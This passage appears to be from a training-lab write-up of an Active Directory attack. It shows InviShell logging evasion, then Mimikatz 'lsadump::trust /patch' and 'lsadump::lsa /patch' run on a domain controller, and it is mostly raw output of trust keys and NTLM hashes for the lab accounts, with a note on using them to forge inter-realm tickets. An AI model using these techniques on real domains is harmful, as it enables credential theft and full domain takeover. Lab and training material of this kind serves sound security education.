lm - 9: ff4d840e4820d9b0c08bc936cf8235b5
lm -10: 6f9ca1d9407d7b4862e6a702866e1244
lm -11: 8b2a3fa3c2dc365c4a6287168e51a8b1
lm -12: 3fe8a2bfac42c96c5b0bd6c082d26212
lm -13: 675e94041cdcccbea70aa9ccee41e11b
lm -14: 7060b2d56a315f0c0af1055471646d5e
lm -15: 748a7f5a95001aafe955f7877ca6e9fb
lm -16: 945515929b61517cb739c723b45147cf
lm -17: 67f3de4fdf0e556a7d587c3b3dd573e7
lm -18: 348ea186e37015ae6296b0d135c5b282
lm -19: e5a6ea8d1989a07251f41086e0283c92
lm -20: 4feafafdb95a5c87830e4d8e59b9aac8
lm -21: 69565fc1e5d2e77b6a6def541a424c52
lm -22: 1dec327b63079927d47dcb6f6cb4615a
lm -23: aff90a6cec45ae3c0fc9324aa6b160c0

Supplemental Credentials:
* Primary:Kerberos-Newer-Keys *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgtmcorp
Default Iterations : 4096
Credentials
aes256_hmac (4096) : a3641d2617d340f575fd9887d39ea62917146598ceb6884f514245846996869f
aes128_hmac (4096) : 2ddb5e4620b091f1b25edbe867faaf61
des_cbc_md5 (4096) : e301c257c4d95854
OldCredentials
aes256_hmac (4096) : 604c9d686c3ab88d80e263c05ef9f03a78560ca4c5ba75eacb83bb7b833bd6e4
aes128_hmac (4096) : b9872e40082bab1377e4451b459f673c
des_cbc_md5 (4096) : d604a43245f80d94
OlderCredentials
aes256_hmac (4096) : 604c9d686c3ab88d80e263c05ef9f03a78560ca4c5ba75eacb83bb7b833bd6e4
aes128_hmac (4096) : b9872e40082bab1377e4451b459f673c
des_cbc_md5 (4096) : d604a43245f80d94

* Primary:Kerberos *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgtmcorp
Credentials
des_cbc_md5 : e301c257c4d95854
OldCredentials
des_cbc_md5 : d604a43245f80d94

* Packages *
NTLM-Strong-NTOWF

* Primary:WDigest *
01 ffbe9dc1f901736fc1a64af088f42147
02 50250d44d39f272d45a959bf7dc6b4bd
03 9d39b50580db05b8e17cd72efdd3fc4c
04 ffbe9dc1f901736fc1a64af088f42147
05 50250d44d39f272d45a959bf7dc6b4bd
06 b36ae76041e8eec2d6552b295459af57
07 ffbe9dc1f901736fc1a64af088f42147
08 03188e6cf47113fd7976795d13f94027
09 03188e6cf47113fd7976795d13f94027
10 c60cc6a03cb1559e34df389e944b7c2b
11 74bd1d549a65f210ead80af681d5839b
12 03188e6cf47113fd7976795d13f94027
13 8c255ecec5d4fe9649a1d0a0e6cf6c3d
14 74bd1d549a65f210ead80af681d5839b
15 c33ca24e2249f6e6bb3b65fa128140c1
16 c33ca24e2249f6e6bb3b65fa128140c1
17 ecad7512f48595730ee83e556764837e
18 654f799ec893c292b813c38ebec345d4
19 3acff4445598f6d2f4eab0f6c49e380a
20 2e0184f72cad0a41144ddc0c088e4c4a
21 a6c490ad7db55d3d2a82ac68dfeb1e28
22 a6c490ad7db55d3d2a82ac68dfeb1e28
23 58196264ccf3d90f55df62f6d027ecaa
24 50709fc009d15f6adf90e785acaa8922
25 50709fc009d15f6adf90e785acaa8922
26 c8019344d39510f9c8deb4df1d6a6e80
27 92b55ea933b435e64fc5fdf7fd548618
28 7ae32070227877546a727226d151c296
29 f5cc0de17036214a554922c0ed484ec6

mimikatz(commandline) # exit
Bye!

Invoke-Mimi

lsadump::trust /patch

The trust keys can also be obtained with the lsadump::trust /patch command of Mimikatz. We need to look for the [ In ] trust key from the child domain to the parent domain.

C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> Invoke-Command -ComputerName dcorp-dc.dollarcorp.moneycorp.local -ScriptBlock { $env:username;$env:computername }
svcadmin
DCORP-DC
PS C:\Windows\system32> $session = New-PSSession -ComputerName dcorp-dc.dollarcorp.moneycorp.local
PS C:\Windows\system32> Invoke-Command -Session $session -FilePath C:\AD\Tools\Invoke-MimiEx.ps1
PS C:\Windows\system32> Enter-PSSession -Session $session
[dcorp-dc.dollarcorp.moneycorp.local]: PS C:\Users\svcadmin\Documents> Invoke-Mimi -Command '"lsadump::trust /patch"'

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 18:36:14


.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # lsadump::trust /patch

Current domain: DOLLARCORP.MONEYCORP.LOCAL (dcorp / S-1-5-21-719815819-3726368948-3917688648)

Domain: MONEYCORP.LOCAL (mcorp / S-1-5-21-335606122-960912869-3279953914)


[ In ] DOLLARCORP.MONEYCORP.LOCAL -> MONEYCORP.LOCAL
* 6/13/2024 9:05:32 PM - CLEAR - 2a 89 1d fb 1f 4e c3 5f 53 b7 79 2a 8a f1 fc ad 7f 1d 22
a0 24 25 01 2d f0 2e dd cb c1 9c 65 3c 3d a9 ba 00 2f 78 d4 dd 71 9b de d0 ab 14 c2 49 ac e8 dc
b8 2f 51 dc d8 e6 98 f2 0b 29 2f 1a b9 93 9b e0 c5 63 22 cf 39 f0 1c f4 27 cc 14 92 15 20 74 9b
38 32 86 eb 21 9b 98 a1 9b 03 a8 59 3d af ca 3c 88 4e 17 cd b1 29 9a 2c 9a 11 3e af 44 dd aa 03
76 01 3a f6 1a c4 ca 61 ee df 41 08 61 21 0b 3a 79 99 aa 89 9c 4e ca 42 79 c8 85 2a a6 18 36 6b
18 94 63 ce df cc 58 ff 95 81 d3 e9 e1 48 4a 85 2d c2 61 0a cd 2c b9 1a 58 a6 9c 9a 7d e4 b4 27
32 c1 df ee 48 90 03 35 fe 77 e6 97 37 6a 75 91 10 45 bc 91 29 69 db 9c 00 5a 06 e0 31 fe 44 17
c4 09 ec 7a 39 ca 46 b3 0f 8f d0 e9 39 e6 8d 2c 02 be 6b bd 2c c5 4b 13 a9 9d 14 43 e0
* aes256_hmac 09e60c921003dd4b72c5fbd63cb52aac316ef305e797a5b9d837c5a6134b310a
* aes128_hmac 7eea125ae826bb26dc8e273b6b8685b2
* rc4_hmac_nt a8f73b279dc7257c7a8a2d0c911043d2

[ Out ] MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL


* 6/13/2024 9:01:43 PM - CLEAR - d9 10 c3 61 76 ff 36 ad e2 65 a8 d5 4e f3 84 92 b0 82 73
3d 5f 35 a0 ed 30 96 2d 39 64 c3 82 3b 16 0b af ae ae ff a4 77 05 2c f5 47 2a d6 77 a5 69 25 5a
a7 a7 e5 3f 4e 09 c7 e0 31 f4 e2 53 49 0e f2 e9 e3 1c 5a 7b d8 1d 06 9c 95 98 ea 38 2b 45 d3 76
be 15 d2 8b c3 31 38 06 fb ca 0f 36 c1 de b1 a2 df 3a 05 4e 14 e4 17 04 57 81 18 06 77 ef 6d da
bb e3 60 42 ce 53 d7 a4 31 31 d8 98 05 06 e4 5a af bb dc e4 5c ff f1 43 46 9a aa 08 90 4b 25 35
5e 5d 48 21 eb 44 f3 33 bc 4f 03 d5 fc 69 29 b7 de 2b ad 9c 1c 73 a0 cc a5 79 e5 91 13 b3 d3 af
c8 fa 92 cc 6f 13 2f a1 7d d1 28 de ef 96 90 8f 6d 14 36 25 0a 4c af 57 ae 51 5d 9a 8e 26 90 02
12 64 85 1b 28 9f 72 1c 49 b0 90 92 a0 b7 88 69 b7 96 87 bf 00 a4 a4 b2 35 fa 57 c7 8e
* aes256_hmac 574a1d8ebb609f51bb9028d6c47edd340c5076be83d1336f877e9fc209ffa637
* aes128_hmac c2b6e81c3d0b8e91df418a3a32d1132f
* rc4_hmac_nt 170847fffcf86c9d2dcc4c45cc734e2b

[ In-1] DOLLARCORP.MONEYCORP.LOCAL -> MONEYCORP.LOCAL


* 5/3/2024 9:05:28 PM - CLEAR - 40 1f 1d 77 a1 92 53 70 df 55 ca 73 b4 c6 8c b7 c2 ed 76 f0
cd ac f9 82 f7 09 01 aa ad 62 62 a9 0a 81 a5 73 9d ff 02 dd 13 ce 65 74 5b 4a b9 ec 91 1d e7 bc
c3 45 93 05 79 a9 e7 58 9a a0 d0 46 2a 9d 33 1e 09 bb 51 a5 76 15 57 d0 db e0 5c 45 38 c7 93 57
b2 1d cf 14 c4 c7 48 f7 8d a7 53 31 12 4a 53 b6 45 a7 4c 9b 19 d5 c9 f6 e0 da 4f 01 d6 a1 6e 0b
2f 79 c2 49 95 61 81 da 67 d2 b6 7f ff 86 8a d8 5f 3a 99 49 62 be 6b 5a 31 29 b7 4e d4 2c a3 29
01 c7 94 86 8a 2c 5f 8e 76 f7 97 d3 7d c6 60 0a 66 9d 24 a5 9a 90 9b 3b 85 4a 89 b3 b0 6c e5 78
6a c2 08 27 e4 84 09 f9 f3 d9 f4 ec f6 35 f2 c2 9a 7b 4c 5d 7d 90 09 77 dd 60 6c 2b 06 01 0f d8
18 34 94 d7 4a a5 0f 5d 63 a4 7e a6 6a 14 f2 74 ba 75 1d 4d d0 36 fc ba 24 80 a8 6d
* aes256_hmac 55857d0270aa7dddf35db46932d75b53a8520c36ea3782ccd3403249e8f74786
* aes128_hmac a915717424b3d2b8630c55e5faf748e7
* rc4_hmac_nt 692acf0a13b6446ee4898339932172be

[Out-1] MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL


* 6/13/2024 9:01:43 PM - CLEAR - b8 a3 df 9c 39 7f c3 9f b9 de 9d 68 85 9b 4b c3 bc ca 63
2e df fc b1 db 5d 1f 18 5d 3e 9d 15 2f b6 68 b9 a4 7f ea 29 88 de 6f b3 ac cb fc 22 01 bd c3 c9
88 f5 05 d2 35 41 50 6c b9 1d ff 86 ee 02 75 9f 00 25 33 5d 43 c6 fb d5 42 d0 74 31 27 42 49 35
20 af 04 fe 13 21 81 78 2c 63 0c 8f c9 c0 ce 8e 94 08 92 8c 48 4c 30 36 5a 11 20 f5 70 d3 d0 a5
fa 43 df 1b db 57 da 5f 62 56 d5 83 71 07 eb 96 ba cc 5b bf 5f 42 08 5d 9f 7a fb 99 de 8d 8e 62
25 9a 39 0c 7e d2 4d a2 e7 1d 05 45 d2 ca 76 86 29 ad 33 24 fb 00 28 02 a2 0b d7 27 c8 c2 26 2c
66 bb e3 16 5a 00 98 a6 42 21 0c 24 71 08 57 3d 85 15 a8 ea d4 e3 f1 db 65 81 a4 ea fe 80 a0 24
34 03 7e 52 1a d0 22 ef c9 da 89 10 60 9b ca 0d 5e c6 e2 15 02 a9 d3 3a 51 a6 3f 3d 51
* aes256_hmac ca5dc3eec2614f058b015bca83b1bd630f1ce43f9dc260e024f601a77a9f07fb
* aes128_hmac 8bf703993346b04723ae9267c7ca3593
* rc4_hmac_nt 757d0a697d2c7eaf3ea5137543430a22

Domain: US.DOLLARCORP.MONEYCORP.LOCAL (US / S-1-5-21-1028785420-4100948154-1806204659)


[ In ] DOLLARCORP.MONEYCORP.LOCAL -> US.DOLLARCORP.MONEYCORP.LOCAL
* 7/3/2024 10:06:26 PM - CLEAR - 83 1a eb 7a ea 4e fe cf 18 a9 84 b8 0c ce 12 e2 46 0a 08
10 c9 db 94 ca c5 1f f9 9b
* aes256_hmac 5cf36b688ae83b1eeacdbc16b0acba87ab90f02aab39969c4a447b4162680a3e
* aes128_hmac ee01f44cbb5b8ac8388e7e249e539dd2
* rc4_hmac_nt 3bc75c500d5b5ff9d6d246c80da6a2fc

[ Out ] US.DOLLARCORP.MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL


* 7/3/2024 10:06:26 PM - CLEAR - 83 1a eb 7a ea 4e fe cf 18 a9 84 b8 0c ce 12 e2 46 0a 08
10 c9 db 94 ca c5 1f f9 9b
* aes256_hmac eb65fa45360257e32e90ff985ff48a7f9adc307c7d34d768e608c076590b248b
* aes128_hmac 1b68217402a894b802e4b28acfffedbd
* rc4_hmac_nt 3bc75c500d5b5ff9d6d246c80da6a2fc

[ In-1] DOLLARCORP.MONEYCORP.LOCAL -> US.DOLLARCORP.MONEYCORP.LOCAL


* 5/4/2024 9:06:11 PM - CLEAR - 59 6a fc b7 91 b3 7f 68 bd e1 df 76 b5 ea 21 3e e1 ff f9 ed
fb 19 bd 65 11 f1 d0 dc 29 f5 1e d6 a4 a1 e4 50 de 1c 72 ab 54 3a 10 95 0d e2 8d ab 83 63 a3 be
e1 ee 28 8d ce e9 9b f1 e1 6c 74 b8 93 2c 79 05 17 6d e0 ca a3 90 ca 74 4f 87 90 46 d4 ae 28 fc
92 f3 02 69 cb fa e4 a6 91 98 b8 88 45 89 a0 76 35 4e 54 7b cf e8 24 54 a6 a1 63 b7 5d 85 e0 28
c6 79 51 6e 65 6b 90 e6 68 ce 8d b2 34 22 99 be fd 98 e9 50 bf fb 47 48 4e bb e1 2f 31 5b 26 7b
66 d5 a8 38 c0 16 9e 47 57 19 5a 60 a6 44 06 90 54 d1 39 95 77 c5 42 85 bb 67 84 18 70 a3 ec 53
91 1f 0a 62 0c 2f 15 e6 40 b5 fa eb 4d 03 c7 39 6d 9b 5c b6 3b b3 dd 5d 2d d3 15 c8 3b cf 0a 54
13 15 ee c0 9d 43 69 76 b9 c4 dc 61 0b 54 00 1a ed ee d1 4d ef 16 fb d9 e8 12 40 76
* aes256_hmac 5c388533716682abae7ccc5f6578210b1d5b8d3c36c360bc70eb42a6b3d73da7
* aes128_hmac ead9db9250708a18b2874c5e823a945c
* rc4_hmac_nt 93c84ded86cccbd8959d89337f0130b2

[Out-1] US.DOLLARCORP.MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL


* 6/15/2024 9:02:29 PM - CLEAR - 4e 5d 18 db 1e cb b8 d1 d2 08 d5 39 8d 63 1f 8d f7 fe de
77 b1 79 b8 c0 62 18 06 60 2b 6e 04 57 f3 8d a8 14 22 fa 1e 30 c2 55 5a 09 23 26 68 de a6 31 27
11 b5 be 9a f2 0a 51 cc be 43 22 41 75 4e 89 ce cc fa 69 d7 20 79 ae b8 54 77 14 62 e8 04 82 5a
d4 ab dc 82 8e ab 39 2b 6b dd 44 67 c1 ec 79 44 9b 7c 5d 2e 65 d4 56 db 10 dc ad fc e3 46 57 e1
80 ed e1 9d f4 05 d4 87 9a 3d c5 a0 a1 0c 82 58 71 08 ec 05 ce c4 1e 9c 81 7c 05 90 4b ee bc 55
4e 3b 6d c8 7b 0c 34 37 94 a9 1f 3f f3 fd 69 60 8e 63 9a 0a 40 65 eb 9d 88 63 7b da 83 3c 96 9c
3c 51 25 17 11 9e d6 da b6 b4 50 d3 73 c0 83 61 2a fd 31 91 28 65 b3 ac 0e e6 67 e9 3e 3c 69 62
7a ed 58 fe 4b 2f 3d 04 3b f4 25 d7 ce 0b 4d b7 d0 95 35 18 18 a2 46 05 7d b4 b6 bc d7
* aes256_hmac 9615182496dda937ff1320f133228817abff23c853f3f86c6e50df601f7fbd77
* aes128_hmac 969e2de28f56b8011f59288f39a5e87a
* rc4_hmac_nt 533a3e349ca3030f5ef794c1479c6343

Domain: EUROCORP.LOCAL (ecorp / S-1-5-21-3333069040-3914854601-3606488808)


[ In ] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL
* 7/3/2024 10:06:18 PM - CLEAR - 42 fd 91 8a 73 19 f9 64 3d 71 82 ad 5d 6f c3 2f 00 63 6f
73 28 89 38 09 67 7a 18 6c
* aes256_hmac f19dda97627c16d13397a0cacbe3cf50d66588a65576e5187cdc1654ff2f1b79
* aes128_hmac 07e0f4d54b1a6b7fdd8b795ea07cb075
* rc4_hmac_nt 48535da9746fc33e5e04cca00c31a7e2

[ Out ] EUROCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL


* 7/3/2024 10:06:18 PM - CLEAR - 42 fd 91 8a 73 19 f9 64 3d 71 82 ad 5d 6f c3 2f 00 63 6f
73 28 89 38 09 67 7a 18 6c
* aes256_hmac 85d2a61c7e4263bb64eaf410f6a1408113243cee0aef3bd2aa050f6d69285907
* aes128_hmac c32996882da31e004c4dc95a8ab09b11
* rc4_hmac_nt 48535da9746fc33e5e04cca00c31a7e2

[ In-1] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL


* 6/26/2024 9:01:39 PM - CLEAR - 23 c3 9f 69 28 6b 93 17 29 a5 f3 1b c6 24 16 61 ff 3a 8b
04 17 3a 35 5c a2 6c 13 d7
* aes256_hmac fd77a2766cf1b9a86118f8e5ad692ab46fe292ccb0cc8bd3326be685a051bc3f
* aes128_hmac 78e5ed11bce7d5ec661e1e05abac1e89
* rc4_hmac_nt 7c36fa5f301d69efdbb07a1edf33c9df

[Out-1] EUROCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL


* 6/26/2024 9:01:39 PM - CLEAR - 23 c3 9f 69 28 6b 93 17 29 a5 f3 1b c6 24 16 61 ff 3a 8b
04 17 3a 35 5c a2 6c 13 d7
* aes256_hmac c7075e427455e20f0b758b70906a036002bc07cc81601506ea094524c5bd2fb7
* aes128_hmac 76964257460a93be4325636988824996
* rc4_hmac_nt 7c36fa5f301d69efdbb07a1edf33c9df

lsadump::lsa /patch
The trust keys can also be obtained by dumping every account hash held by the LSASS process on a domain controller with lsadump::lsa /patch. Trust accounts appear as ordinary accounts named after the trusting domain with a trailing $ (mcorp$, US$ and ecorp$ at the end of the listing below), and their NTLM hash is the rc4_hmac_nt trust key: ecorp$ carries 48535da9746fc33e5e04cca00c31a7e2, the same value shown above for the EUROCORP.LOCAL trust, and mcorp$ carries the key used for the inter-realm ticket forged in the next section. Note that /patch writes to LSASS memory on the DC, which needs local administrator or SYSTEM rights there and is easy to spot; lsadump::dcsync for the individual trust account retrieves the same key over replication without touching LSASS.
lsadump::lsa /patch
[dcorp-dc.dollarcorp.moneycorp.local]: PS C:\Users\svcadmin\Documents> Invoke-Mimi -Command
'"lsadump::lsa /patch"'

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 18:36:14


.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # lsadump::lsa /patch


Domain : dcorp / S-1-5-21-719815819-3726368948-3917688648

RID : 000001f4 (500)


User : Administrator
LM :
NTLM : af0686cc0ca8f04df42210c9ac980760

RID : 000001f5 (501)


User : Guest
LM :
NTLM :

RID : 000001f6 (502)


User : krbtgt
LM :
NTLM : 4e9815869d2090ccfca61c1fe0d23986

RID : 00000459 (1113)


User : sqladmin
LM :
NTLM : 07e8be316e3da9a042a9cb681df19bf5

RID : 0000045a (1114)


User : websvc
LM :
NTLM : cc098f204c5887eaa8253e7c2749156f

RID : 0000045b (1115)


User : srvadmin
LM :
NTLM : a98e18228819e8eec3dfa33cb68b0728

RID : 0000045d (1117)


User : appadmin
LM :
NTLM : d549831a955fee51a43c83efb3928fa7

RID : 0000045e (1118)


User : svcadmin
LM :
NTLM : b38ff50264b74508085d82c69794a4d8

RID : 0000045f (1119)


User : testda
LM :
NTLM : a16452f790729fa34e8f3a08f234a82c

RID : 00000460 (1120)


User : mgmtadmin
LM :
NTLM : 95e2cd7ff77379e34c6e46265e75d754

RID : 00000461 (1121)


User : ciadmin
LM :
NTLM : e08253add90dccf1a208523d02998c3d

RID : 00000462 (1122)


User : sql1admin
LM :
NTLM : e999ae4bd06932620a1e78d2112138c6

RID : 00001055 (4181)


User : studentadmin
LM :
NTLM : d1254f303421d3cdbdc4c73a5bce0201

RID : 00003521 (13601)


User : student161
LM :
NTLM : 12fe951ecdce0ee2edd5a4d71a0d6e0b

RID : 00003522 (13602)


User : student162
LM :
NTLM : 2230beda3bcd55b72cc4c1a5ef8170e9

RID : 00003523 (13603)


User : student163
LM :
NTLM : ccbca8c20310dbc0c5c9dcf1fde108b8

RID : 00003524 (13604)


User : student164
LM :
NTLM : 55e3baaf40c19d73f46b601d3cbfd41b

RID : 00003525 (13605)


User : student165
LM :
NTLM : a42ea87cc59018a3b49ec5d9be31a646

RID : 00003526 (13606)


User : student166
LM :
NTLM : 24b141d31352ea4f12745579e4885756

RID : 00003527 (13607)


User : student167
LM :
NTLM : 5ea118645828dcab565bf5895ca4ea57

RID : 00003528 (13608)


User : student168
LM :
NTLM : 53171b516f11d8b38e9fb0572014ba55

RID : 00003529 (13609)


User : student169
LM :
NTLM : 5a231022659299b4a1f2d1651d1c5106

RID : 0000352a (13610)


User : student170
LM :
NTLM : 9b0a73646f1fab4f0321f4526f3ed8f1

RID : 0000352b (13611)


User : student171
LM :
NTLM : 83c26fe5a55558897267fdf9a0d91d0d

RID : 0000352c (13612)


User : student172
LM :
NTLM : 1c0175bcef53648c75a88d566d2df3da

RID : 0000352d (13613)


User : student173
LM :
NTLM : de2a9206f558dddf3ded7b5f3427182c

RID : 0000352e (13614)


User : student174
LM :
NTLM : 6c22f89d3c33d5d260f195be679212b3
RID : 0000352f (13615)
User : student175
LM :
NTLM : 2c102014852ffa9959434ac02dc0fecd

RID : 00003530 (13616)


User : student176
LM :
NTLM : a8918ce94dcd39974537493be3a4895c

RID : 00003531 (13617)


User : student177
LM :
NTLM : d348e38df9c4883b5f234d83deb038f3

RID : 00003532 (13618)


User : student178
LM :
NTLM : cc4f8e304a59ed00c47a87d42b7c107f

RID : 00003533 (13619)


User : student179
LM :
NTLM : 667598cfb79b5ca955c70afba1606ee2

RID : 00003534 (13620)


User : student180
LM :
NTLM : 2e893c9e2619ca18f0560e732c573eb9

RID : 00003535 (13621)


User : Control161user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003536 (13622)


User : Control162user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003537 (13623)


User : Control163user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003538 (13624)


User : Control164user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003539 (13625)


User : Control165user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353a (13626)


User : Control166user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0
RID : 0000353b (13627)
User : Control167user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353c (13628)


User : Control168user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353d (13629)


User : Control169user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353e (13630)


User : Control170user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353f (13631)


User : Control171user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003540 (13632)


User : Control172user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003541 (13633)


User : Control173user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003542 (13634)


User : Control174user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003543 (13635)


User : Control175user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003544 (13636)


User : Control176user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003545 (13637)


User : Control177user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003546 (13638)


User : Control178user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003547 (13639)


User : Control179user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003548 (13640)


User : Control180user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003549 (13641)


User : Support161user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354a (13642)


User : Support162user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354b (13643)


User : Support163user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354c (13644)


User : Support164user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354d (13645)


User : Support165user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354e (13646)


User : Support166user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354f (13647)


User : Support167user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003550 (13648)


User : Support168user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003551 (13649)


User : Support169user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003552 (13650)


User : Support170user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003553 (13651)


User : Support171user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003554 (13652)


User : Support172user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003555 (13653)


User : Support173user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003556 (13654)


User : Support174user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003557 (13655)


User : Support175user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003558 (13656)


User : Support176user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003559 (13657)


User : Support177user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000355a (13658)


User : Support178user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000355b (13659)


User : Support179user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000355c (13660)


User : Support180user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000355d (13661)


User : VPN161user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000355e (13662)


User : VPN162user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000355f (13663)


User : VPN163user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003560 (13664)


User : VPN164user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003561 (13665)


User : VPN165user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003562 (13666)


User : VPN166user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003563 (13667)


User : VPN167user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003564 (13668)


User : VPN168user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003565 (13669)


User : VPN169user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003566 (13670)


User : VPN170user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003567 (13671)


User : VPN171user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003568 (13672)


User : VPN172user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003569 (13673)


User : VPN173user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881
RID : 0000356a (13674)
User : VPN174user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356b (13675)


User : VPN175user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356c (13676)


User : VPN176user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356d (13677)


User : VPN177user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356e (13678)


User : VPN178user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356f (13679)


User : VPN179user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003570 (13680)


User : VPN180user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 000003e8 (1000)


User : DCORP-DC$
LM :
NTLM : 81a9ccc2f44b988af78448ad78297ad5

RID : 00000451 (1105)


User : DCORP-ADMINSRV$
LM :
NTLM : b5f451985fd34d58d5120816d31b5565

RID : 00000452 (1106)


User : DCORP-APPSRV$
LM :
NTLM : b4cb7bf8b93c78b8051c7906bb054dc5

RID : 00000453 (1107)


User : DCORP-CI$
LM :
NTLM : f76f48c176dc09cfd5765843c32809f3

RID : 00000454 (1108)


User : DCORP-MGMT$
LM :
NTLM : 0878da540f45b31b974f73312c18e754
RID : 00000455 (1109)
User : DCORP-MSSQL$
LM :
NTLM : b205f1ca05bedace801893d6aa5aca27

RID : 00000456 (1110)


User : DCORP-SQL1$
LM :
NTLM : 3686dfb420dc0f9635e70c6ca5875b49

RID : 0000106a (4202)


User : DCORP-STDADMIN$
LM :
NTLM : 323e49189b1edbea4a323142017328cb

RID : 00003571 (13681)


User : DCORP-STD161$
LM :
NTLM : 9ef9daa7b4bc99ab3e4121f2abd037c7

RID : 00003572 (13682)


User : DCORP-STD162$
LM :
NTLM : 354a9b4320a227e36d82c19f92851f5b
